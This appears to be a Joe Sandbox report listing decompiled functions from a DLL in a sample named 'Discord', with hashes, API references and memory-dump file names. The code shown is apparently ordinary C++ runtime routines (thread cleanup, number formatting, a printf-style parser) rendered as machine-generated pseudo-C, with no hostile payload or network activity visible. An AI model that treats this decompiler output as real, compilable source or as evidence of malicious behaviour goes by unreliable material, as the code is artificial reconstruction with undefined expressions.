Instruction Fuzzy Hash: F7E01AB4049A009FC305AF28D4D4829B7E5EED8764B22894DE99A8F255DF309841CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6DE939DA Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE93A13
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000), ref: 6DE93A22
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000), ref: 6DE93A31
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE93A3A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: b3363416d047809b576fd432bdff468a86801e34b3ada0152cabf0c3be1e5a8d
Instruction ID: 23fbe9aece00e934fbf09a3be46b9aa682abe0d736a13d0857b973591c41fa21
Opcode Fuzzy Hash: b3363416d047809b576fd432bdff468a86801e34b3ada0152cabf0c3be1e5a8d
Instruction Fuzzy Hash: ECE0BFB40499009FC705EF14D5D4828B7E9FFD9654F22864CE98A9B255DF305541CB12

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8DBB6 Relevance: 6.0, APIs: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE8DBB6() {
				intOrPtr _t8;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t18;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t21;

				_t13 = _t8;
				 *_t20 = _t19 - 0x1c;
				L6DE8DD48();
				_t21 = _t20 - 4;
				while(1) {
					_t11 = E6DE94F70(_t19 - 0x28);
					 *_t21 = _t13;
					L6DE8EBA0();
					_t14 = _t19 - 0x24;
					_t18 = _t11;
					 *_t21 = _t14;
					_t13 = _t18;
					L6DE8DD48();
					_t21 = _t21 - 4;
				}
			}

0x6de8dbb6
0x6de8dbc1
0x6de8dbc4
0x6de8dbc9
0x6de8dbcc
0x6de8dbcf
0x6de8dbd4
0x6de8dbd7
0x6de8dbdc
0x6de8dbdf
0x6de8dbe4
0x6de8dbe7
0x6de8dbec
0x6de8dbf1
0x6de8dbf1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8DBC4
_ZNSt6threadD1Ev.DPUB1 ref: 6DE8DBCF

Part of subcall function 6DE94F70: pthread_equal.LIBWINPTHREAD-1 ref: 6DE94F80

_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8DBD7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8DBEC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeSt6threadUnwind_pthread_equal
String ID:
API String ID: 2155883033-0
Opcode ID: a2151d52fc4ecfe0e5ea58adf9fc87be69223c72d26ae88a3825db2b641d4019
Instruction ID: 841702e6ca56135da645049983a07d330d213d3bd9730095c22171f3cc46fb00
Opcode Fuzzy Hash: a2151d52fc4ecfe0e5ea58adf9fc87be69223c72d26ae88a3825db2b641d4019
Instruction Fuzzy Hash: F1E06D759045098FCB00EF74C1D449CF7F0AF48218F11456EC955A7211EB306E09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE88684 Relevance: 6.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE88684() {
				intOrPtr _t4;
				intOrPtr _t6;
				intOrPtr _t8;
				void* _t12;
				intOrPtr* _t13;

				_t8 = _t4;
				while(1) {
					E6DE94F70(_t12 - 0x10);
					_t6 = E6DE94F70(_t12 - 0x14);
					 *_t13 = _t8;
					L6DE8EBA0();
					_t8 = _t6;
					E6DE94F70(_t12 - 0xc);
				}
			}

0x6de88684
0x6de8867a
0x6de8867d
0x6de88663
0x6de88668
0x6de8866b
0x6de88673
0x6de88675
0x6de88675

APIs

_ZNSt6threadD1Ev.DPUB1 ref: 6DE8867D

Part of subcall function 6DE94F70: pthread_equal.LIBWINPTHREAD-1 ref: 6DE94F80

_ZNSt6threadD1Ev.DPUB1 ref: 6DE88663

Part of subcall function 6DE94F70: _ZSt9terminatev.LIBSTDC++-6 ref: 6DE94F8D

_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8866B
_ZNSt6threadD1Ev.DPUB1 ref: 6DE88675

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: St6thread$ResumeSt9terminatevUnwind_pthread_equal
String ID:
API String ID: 317380490-0
Opcode ID: 1b8b19889f057f3b125026d1fc9eae5bf922c09ff7a7aa118668d75b956d0814
Instruction ID: a032083c60249ece2983e3ba27464a371ba44ca08bfb77237ecce78343e30e39
Opcode Fuzzy Hash: 1b8b19889f057f3b125026d1fc9eae5bf922c09ff7a7aa118668d75b956d0814
Instruction Fuzzy Hash: 05D0C9319692068ECF04EBB0E8D04ADB370BE1920CBA2592E46676B19AEF381A01C655

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8865E Relevance: 6.0, APIs: 4, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE8865E() {
				intOrPtr _t4;
				intOrPtr _t5;
				intOrPtr _t8;
				void* _t12;
				intOrPtr* _t13;

				_t8 = _t4;
				while(1) {
					_t5 = E6DE94F70(_t12 - 0x14);
					 *_t13 = _t8;
					L6DE8EBA0();
					_t8 = _t5;
					E6DE94F70(_t12 - 0xc);
					E6DE94F70(_t12 - 0x10);
				}
			}

0x6de8865e
0x6de88660
0x6de88663
0x6de88668
0x6de8866b
0x6de88673
0x6de88675
0x6de8867d
0x6de8867d

APIs

_ZNSt6threadD1Ev.DPUB1 ref: 6DE88663

Part of subcall function 6DE94F70: pthread_equal.LIBWINPTHREAD-1 ref: 6DE94F80

_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8866B
_ZNSt6threadD1Ev.DPUB1 ref: 6DE88675

Part of subcall function 6DE94F70: _ZSt9terminatev.LIBSTDC++-6 ref: 6DE94F8D

_ZNSt6threadD1Ev.DPUB1 ref: 6DE8867D

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: St6thread$ResumeSt9terminatevUnwind_pthread_equal
String ID:
API String ID: 317380490-0
Opcode ID: ce3a0f830224fbd96c46b221b57d4b5786e615a32a710bf980005134b92dd19c
Instruction ID: 675477e98dc56136d3b2777e5b8f4f165b4cbd258604f4ec71728d02afde29dc
Opcode Fuzzy Hash: ce3a0f830224fbd96c46b221b57d4b5786e615a32a710bf980005134b92dd19c
Instruction Fuzzy Hash: 43D012319292068ECF04EFB0D8D04EDB370BE1820CBA2182F46236719AEF381B04C655

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8EFF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE8EFF0(signed int __eax, signed int __ecx, unsigned int __edx) {
				void* _v16;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				unsigned int _v72;
				signed int _t100;
				intOrPtr _t101;
				intOrPtr _t110;
				signed char _t111;
				intOrPtr _t112;
				intOrPtr _t119;
				intOrPtr _t120;
				void* _t123;
				signed int _t124;
				signed int _t125;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed char _t146;
				signed int _t147;
				signed int _t152;
				unsigned int _t156;
				intOrPtr _t163;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t178;
				unsigned int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				void* _t183;
				void* _t184;
				signed int* _t185;

				_t178 = __ecx;
				_t184 = _t183 - 0x3c;
				_v52 = __eax;
				_v44 = __eax;
				_t100 =  *((intOrPtr*)(__ecx + 0xc));
				_t146 =  *(__ecx + 4);
				_v48 = __edx;
				_v40 = __edx;
				_t139 =  >=  ? _t100 : 0;
				_t140 = ( >=  ? _t100 : 0) + 0x17;
				_v32 = _t100;
				if((_t146 & 0x00000010) != 0 &&  *((short*)(__ecx + 0x1c)) != 0) {
					_t140 = _t140 + (_t140 * 0x55555556 >> 0x20) - (_t140 >> 0x1f);
				}
				_t101 =  *((intOrPtr*)(_t178 + 8));
				_t102 =  >=  ? _t140 : _t101;
				_t103 = ( >=  ? _t140 : _t101) + 0xf;
				_t104 = ( >=  ? _t140 : _t101) + 0x0000000f & 0xfffffff0;
				_t185 = _t184 - E6DE8EBA8(( >=  ? _t140 : _t101) + 0x0000000f & 0xfffffff0);
				_v36 =  &_v60;
				if((_t146 & 0x00000080) != 0) {
					if(_v48 < 0) {
						asm("adc edx, 0x0");
						_v44 =  ~_v52;
						_v40 =  ~_v48;
					} else {
						 *(_t178 + 4) = _t146 & 0x0000007f;
					}
				}
				_t156 = _v40;
				_t180 = _v44;
				if((_t156 | _t180) == 0) {
					_t141 = _v36;
					goto L15;
				} else {
					_t124 = _v36;
					_v44 = _t178;
					_t179 = _t156;
					_t143 = _t124;
					while(1) {
						 *_t185 = _t180;
						_v72 = _t179;
						_v68 = 0xa;
						_v64 = 0;
						_v32 = _t143 + 1;
						L6DE938E8();
						_t125 = _t124 + 0x30;
						 *_t143 = _t125;
						 *_t185 = _t180;
						_v72 = _t179;
						_v68 = 0xa;
						_v64 = 0;
						L6DE938F0();
						_t152 = _v32;
						_t180 = _t125;
						_t124 = _t156 | _t180;
						_t179 = _t156;
						if(_t124 == 0) {
							break;
						}
						if(_v36 == _t152) {
							L12:
							_t143 = _t152;
							continue;
						}
						_t124 = _v44;
						if(( *(_t124 + 5) & 0x00000010) != 0 &&  *((short*)(_t124 + 0x1c)) != 0) {
							asm("cdq");
							_t156 = _t156 >> 0x1e;
							_t124 = (_t152 - _v36 + _t156 & 0x00000003) - _t156;
							if(_t124 == 3) {
								 *((char*)(_t143 + 1)) = 0x2c;
								_t143 = _t143 + 2;
								continue;
							}
						}
						goto L12;
					}
					_t178 = _v44;
					_t141 = _t152;
					_v32 =  *((intOrPtr*)(_t178 + 0xc));
					L15:
					_t147 = _v32;
					_t181 = _t141;
					if(_t147 <= 0) {
						L19:
						if(_t181 == _v36) {
							if( *((intOrPtr*)(_t178 + 0xc)) != 0) {
								 *_t181 = 0x30;
								_t181 = _t181 + 1;
							}
						}
						_t110 =  *((intOrPtr*)(_t178 + 8));
						if(_t110 <= 0) {
							L29:
							_t111 =  *(_t178 + 4);
							goto L30;
						} else {
							_t163 = _v36 - _t181 + _t110;
							_t111 =  *(_t178 + 4);
							 *((intOrPtr*)(_t178 + 8)) = _t163;
							if(_t163 <= 0) {
								L30:
								if((_t111 & 0x00000080) == 0) {
									if((_t111 & 0x00000001) == 0) {
										_t142 = _t181;
										if((_t111 & 0x00000040) != 0) {
											_t142 = _t142 + 1;
											 *_t181 = 0x20;
										}
									} else {
										_t142 = _t181 + 1;
										 *_t181 = 0x2b;
									}
								} else {
									_t142 = _t181 + 1;
									 *_t181 = 0x2d;
								}
								_t182 = _v36;
								if(_v36 >= _t142) {
									L38:
									_t112 =  *((intOrPtr*)(_t178 + 8));
									 *((intOrPtr*)(_t178 + 8)) = _t112 - 1;
									if(_t112 > 0) {
										goto L37;
									}
									goto L39;
								} else {
									do {
										_t142 = _t142 - 1;
										E6DE8ED70( *_t142, _t178);
									} while (_t142 != _t182);
									_t112 =  *((intOrPtr*)(_t178 + 8));
									 *((intOrPtr*)(_t178 + 8)) = _t112 - 1;
									if(_t112 <= 0) {
										L39:
										return _t112;
									}
									L37:
									E6DE8ED70(0x20, _t178);
									goto L38;
								}
							}
							if((_t111 & 0x000001c0) != 0) {
								 *((intOrPtr*)(_t178 + 8)) = _t163 - 1;
							}
							if( *((intOrPtr*)(_t178 + 0xc)) < 0) {
								if((_t111 & 0x00000600) != 0x200) {
									goto L25;
								}
								_t170 =  *((intOrPtr*)(_t178 + 8));
								 *((intOrPtr*)(_t178 + 8)) = _t170 - 1;
								if(_t170 <= 0) {
									goto L30;
								}
								do {
									_t181 = _t181 + 1;
									 *((char*)(_t181 - 1)) = 0x30;
									_t120 =  *((intOrPtr*)(_t178 + 8));
									 *((intOrPtr*)(_t178 + 8)) = _t120 - 1;
								} while (_t120 > 0);
							} else {
								L25:
								if((_t111 & 0x00000004) != 0) {
									goto L30;
								}
								_t167 =  *((intOrPtr*)(_t178 + 8));
								 *((intOrPtr*)(_t178 + 8)) = _t167 - 1;
								if(_t167 <= 0) {
									goto L30;
								}
								do {
									E6DE8ED70(0x20, _t178);
									_t119 =  *((intOrPtr*)(_t178 + 8));
									 *((intOrPtr*)(_t178 + 8)) = _t119 - 1;
								} while (_t119 > 0);
							}
							goto L29;
						}
					}
					_t123 = _v36 - _t141 + _t147;
					if(_t123 <= 0) {
						goto L19;
					}
					_t181 = _t141 + _t123;
					do {
						_t141 = _t141 + 1;
						 *((char*)(_t141 - 1)) = 0x30;
					} while (_t141 != _t181);
					goto L19;
				}
			}

0x6de8eff4
0x6de8effa
0x6de8effd
0x6de8f000
0x6de8f003
0x6de8f006
0x6de8f009
0x6de8f00c
0x6de8f011
0x6de8f014
0x6de8f01a
0x6de8f01d
0x6de8f210
0x6de8f210
0x6de8f02a
0x6de8f02f
0x6de8f032
0x6de8f035
0x6de8f03d
0x6de8f046
0x6de8f049
0x6de8f050
0x6de8f278
0x6de8f27d
0x6de8f280
0x6de8f056
0x6de8f059
0x6de8f059
0x6de8f050
0x6de8f05f
0x6de8f062
0x6de8f068
0x6de8f29e
0x00000000
0x6de8f06e
0x6de8f06e
0x6de8f071
0x6de8f074
0x6de8f076
0x6de8f078
0x6de8f07b
0x6de8f07e
0x6de8f082
0x6de8f08a
0x6de8f092
0x6de8f095
0x6de8f09a
0x6de8f09d
0x6de8f09f
0x6de8f0a2
0x6de8f0a6
0x6de8f0ae
0x6de8f0b6
0x6de8f0bb
0x6de8f0be
0x6de8f0c2
0x6de8f0c4
0x6de8f0c6
0x00000000
0x00000000
0x6de8f0cb
0x6de8f0f2
0x6de8f0f2
0x00000000
0x6de8f0f2
0x6de8f0cd
0x6de8f0d4
0x6de8f0e2
0x6de8f0e3
0x6de8f0eb
0x6de8f0f0
0x6de8f0f9
0x6de8f0fd
0x00000000
0x6de8f0fd
0x6de8f0f0
0x00000000
0x6de8f0d4
0x6de8f104
0x6de8f107
0x6de8f10c
0x6de8f10f
0x6de8f10f
0x6de8f112
0x6de8f116
0x6de8f131
0x6de8f134
0x6de8f28d
0x6de8f293
0x6de8f296
0x6de8f296
0x6de8f28d
0x6de8f13a
0x6de8f13f
0x6de8f199
0x6de8f199
0x00000000
0x6de8f141
0x6de8f146
0x6de8f148
0x6de8f14d
0x6de8f150
0x6de8f19c
0x6de8f19e
0x6de8f1f4
0x6de8f219
0x6de8f21b
0x6de8f21d
0x6de8f220
0x6de8f220
0x6de8f1f6
0x6de8f1f6
0x6de8f1f9
0x6de8f1f9
0x6de8f1a0
0x6de8f1a0
0x6de8f1a3
0x6de8f1a3
0x6de8f1a9
0x6de8f1ac
0x6de8f1dc
0x6de8f1dc
0x6de8f1e4
0x6de8f1e7
0x00000000
0x00000000
0x00000000
0x6de8f1b0
0x6de8f1b0
0x6de8f1b0
0x6de8f1b8
0x6de8f1bd
0x6de8f1c1
0x6de8f1c9
0x6de8f1cc
0x6de8f1e9
0x6de8f1f0
0x6de8f1f0
0x6de8f1d0
0x6de8f1d7
0x00000000
0x6de8f1d7
0x6de8f1ac
0x6de8f157
0x6de8f15c
0x6de8f15c
0x6de8f164
0x6de8f233
0x00000000
0x00000000
0x6de8f239
0x6de8f241
0x6de8f244
0x00000000
0x00000000
0x6de8f250
0x6de8f250
0x6de8f253
0x6de8f257
0x6de8f25f
0x6de8f25f
0x6de8f16a
0x6de8f16a
0x6de8f16d
0x00000000
0x00000000
0x6de8f16f
0x6de8f177
0x6de8f17a
0x00000000
0x00000000
0x6de8f180
0x6de8f187
0x6de8f18c
0x6de8f194
0x6de8f194
0x6de8f180
0x00000000
0x6de8f164
0x6de8f13f
0x6de8f11d
0x6de8f121
0x00000000
0x00000000
0x6de8f123
0x6de8f126
0x6de8f126
0x6de8f12b
0x6de8f12b
0x00000000
0x6de8f126

APIs

__umoddi3.LIBGCC_S_DW2-1 ref: 6DE8F095
__udivdi3.LIBGCC_S_DW2-1 ref: 6DE8F0B6

Strings

VUUU, xrefs: 6DE8F202

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: __udivdi3__umoddi3
String ID: VUUU
API String ID: 2683374918-2040033107
Opcode ID: 37019cfdb932b801e1abcef30feef61f3a0122c1f8b6916cd54a0cda685d9d9a
Instruction ID: b1d4804d20b9d38015c5c58d1f2c378c109664e0a4173d5fa489f2acf5cab8d2
Opcode Fuzzy Hash: 37019cfdb932b801e1abcef30feef61f3a0122c1f8b6916cd54a0cda685d9d9a
Instruction Fuzzy Hash: B3916D71A147078FDB00CE69C88079AF7F1BF89319F24C529D858E7356EB79E8468B90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9070C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6DE9070C(char* __edi) {
				char _t255;
				signed int _t260;
				char* _t265;
				signed char _t267;
				char* _t268;
				signed int* _t269;
				signed int _t273;
				signed int _t279;
				char* _t281;
				char* _t283;
				char* _t284;
				void* _t287;

				_t281 = __edi;
				while(1) {
					L52:
					__eax = __esp[7];
					__eax = strerror(__esp[7]);
					__eflags = __eax;
					__ebx = __eax;
					if(__eax != 0) {
						goto L13;
					}
					L53:
					__edx = 6;
					__ebx = "(null)";
					L14:
					__ecx =  &(__esp[0xd]);
					__eax = __ebx;
					__eax = E6DE8EEC0(__ebx,  &(__esp[0xd]), __edx);
					while(1) {
						L1:
						_t255 =  *_t281;
						_t265 = _t281 + 1;
						_t284 = _t265;
						if(_t255 == 0) {
							break;
						}
						L2:
						L2:
						if(_t255 != 0x25) {
							_t281 = _t265;
							E6DE8ED70(_t255, _t287 + 0x34);
						} else {
							goto L3;
						}
						continue;
						L3:
						 *(_t287 + 0x40) = 0xffffffff;
						 *(_t287 + 0x3c) = 0xffffffff;
						 *(_t287 + 0x14) = 0;
						 *((intOrPtr*)(_t287 + 0x38)) =  *((intOrPtr*)(_t287 + 0x80));
						_t273 =  *(_t281 + 1) & 0x000000ff;
						 *(_t287 + 0x18) = _t287 + 0x3c;
						 *(_t287 + 0x10) = 0;
						if(_t273 == 0) {
							L8:
							_t281 = _t284;
							_t255 =  *_t281;
							_t265 = _t281 + 1;
							_t284 = _t265;
							if(_t255 != 0) {
								goto L2;
							}
							break;
						} else {
							goto L4;
						}
						do {
							L4:
							_t267 = _t273 - 0x20;
							_t260 = _t273;
							_t283 = _t284 + 1;
							if(_t267 > 0x5a) {
								L70:
								_t268 =  *(_t287 + 0x10);
								__eflags = _t268 - 4;
								if(_t268 == 4) {
									L123:
									_t281 = _t265;
									E6DE8ED70(0x25, _t287 + 0x34);
									goto L1;
								}
								__eflags = _t273 - 0x30 - 9;
								if(_t273 - 0x30 > 9) {
									goto L123;
								}
								__eflags = _t268;
								if(_t268 != 0) {
									__eflags = _t268 - 2;
									_t277 =  !=  ? _t268 : 3;
									 *(_t287 + 0x10) =  !=  ? _t268 : 3;
								} else {
									 *(_t287 + 0x10) = 1;
								}
								__eflags =  *(_t287 + 0x18);
								if(__eflags == 0) {
									L65:
									_t273 =  *(_t284 + 1) & 0x000000ff;
									goto L66;
								} else {
									_t269 =  *(_t287 + 0x18);
									_t279 =  *_t269;
									__eflags = _t279;
									if(__eflags < 0) {
										 *_t269 = _t260 - 0x30;
										_t273 =  *(_t284 + 1) & 0x000000ff;
										_t284 = _t283;
									} else {
										 *( *(_t287 + 0x18)) = _t260 + (_t279 + _t279 * 4) * 2 - 0x30;
										_t273 =  *(_t284 + 1) & 0x000000ff;
										L66:
										_t284 = _t283;
									}
									goto L7;
								}
							}
							switch( *((intOrPtr*)((_t267 & 0x000000ff) * 4 +  &M6DE9829C))) {
								case 0:
									__eax = __esp[4];
									__eflags = __eax;
									if(__eflags != 0) {
										goto L65;
									}
									__esp[0xe] = __esp[0xe] | 0x00000040;
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									goto L7;
								case 1:
									goto L70;
								case 2:
									__eax = __esp[4];
									__eflags = __eax;
									if(__eflags != 0) {
										goto L65;
									}
									__esp[0xe] = __esp[0xe] | 0x00000800;
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									goto L7;
								case 3:
									__edx =  &(__esp[0xd]);
									__eax = E6DE8ED70(__eax, __edx);
									goto L1;
								case 4:
									__eax = __esp[4];
									__eflags = __eax;
									if(__eflags == 0) {
										__esp[0xe] = __esp[0xe] | 0x00001000;
										__esp[0xa] = 0;
										L6DE936E8();
										__ecx =  &(__esp[0xa]);
										__esp[3] =  &(__esp[0xa]);
										__esp[2] = 0x10;
										__esp[1] = __eax;
										__eax =  &(__esp[9]);
										 *__esp =  &(__esp[9]);
										__eax = E6DE924C0();
										__eflags = __eax;
										if(__eflags > 0) {
											__edx = __esp[9] & 0x0000ffff;
											__esp[0x14] = __dx;
										}
										__esp[0x13] = __eax;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									}
									goto L65;
								case 5:
									__ecx = __esp[6];
									__eflags = __esp[6];
									if(__eflags == 0) {
										goto L78;
									}
									__eflags = __esp[4] & 0xfffffffd;
									if(__eflags != 0) {
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										__esp[6] = 0;
										__esp[4] = 4;
										goto L7;
									}
									__edx =  *__ebp;
									__eax = __ebp + 4;
									__ecx = __esp[6];
									__eflags = __edx;
									 *(__esp[6]) = __edx;
									if(__eflags < 0) {
										__edx = __esp[4];
										__eflags = __esp[4];
										if(__eflags != 0) {
											__esp[0x10] = 0xffffffff;
											__ebp = __eax;
											__edx =  *(__esi + 1) & 0x000000ff;
											__esp[6] = 0;
											__esi = __edi;
											goto L7;
										}
										__esp[0xe] = __esp[0xe] | 0x00000400;
										__esp[0xf] =  ~(__esp[0xf]);
									}
									__edx =  *(__esi + 1) & 0x000000ff;
									__ebp = __eax;
									__esi = __edi;
									__esp[6] = 0;
									goto L7;
								case 6:
									__eax = __esp[4];
									__eflags = __eax;
									if(__eflags != 0) {
										goto L65;
									} else {
										__esp[0xe] = __esp[0xe] | 0x00000100;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									}
								case 7:
									__eax = __esp[4];
									__eflags = __eax;
									if(__eflags != 0) {
										goto L65;
									}
									__esp[0xe] = __esp[0xe] | 0x00000400;
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									goto L7;
								case 8:
									__eflags = __esp[4] - 1;
									if(__eflags <= 0) {
										__eax =  &(__esp[0x10]);
										__esp[0x10] = 0;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										__esp[6] = __eax;
										__esp[4] = 2;
										goto L7;
									}
									L78:
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									__esp[4] = 4;
									goto L7;
								case 9:
									__ecx = __esp[4];
									__eflags = __esp[4];
									if(__eflags == 0) {
										__esp[0xe] = __esp[0xe] | 0x00000200;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									}
									goto L70;
								case 0xa:
									__eax = __esp[0xe];
									__eflags = __al & 0x00000004;
									if((__al & 0x00000004) != 0) {
										goto L18;
									}
									goto L68;
								case 0xb:
									__esp[0x10] = 0xffffffff;
									goto L84;
								case 0xc:
									__eax = __esp[0xe];
									__eflags = __al & 0x00000004;
									if((__al & 0x00000004) != 0) {
										goto L20;
									}
									goto L82;
								case 0xd:
									__eax = __esp[0xe];
									__eflags = __al & 0x00000004;
									if((__al & 0x00000004) != 0) {
										goto L51;
									}
									goto L86;
								case 0xe:
									__eax = __esp[0xe];
									__eflags = __al & 0x00000004;
									if((__al & 0x00000004) != 0) {
										goto L49;
									}
									goto L57;
								case 0xf:
									__edx =  *(__esi + 1) & 0x000000ff;
									__eflags = __dl - 0x36;
									if(__dl == 0x36) {
										__eflags =  *(__esi + 2) - 0x34;
										if(__eflags == 0) {
											__edi = __esi + 3;
											__edx =  *(__esi + 3) & 0x000000ff;
											__esp[5] = 3;
											__esi = __edi;
											__esp[4] = 4;
										} else {
											__edx = 0x36;
											__esi = __edi;
											__esp[5] = 2;
											__esp[4] = 4;
										}
										goto L7;
									}
									__eflags = __dl - 0x33;
									if(__eflags != 0) {
										goto L55;
									} else {
										__eflags =  *(__esi + 2) - 0x32;
										if(__eflags == 0) {
											__edi = __esi + 3;
											__edx =  *(__esi + 3) & 0x000000ff;
											__esp[5] = 2;
											__esi = __edi;
											__esp[4] = 4;
										} else {
											__edx = 0x33;
											__esi = __edi;
											__esp[5] = 2;
											__esp[4] = 4;
										}
										goto L7;
									}
								case 0x10:
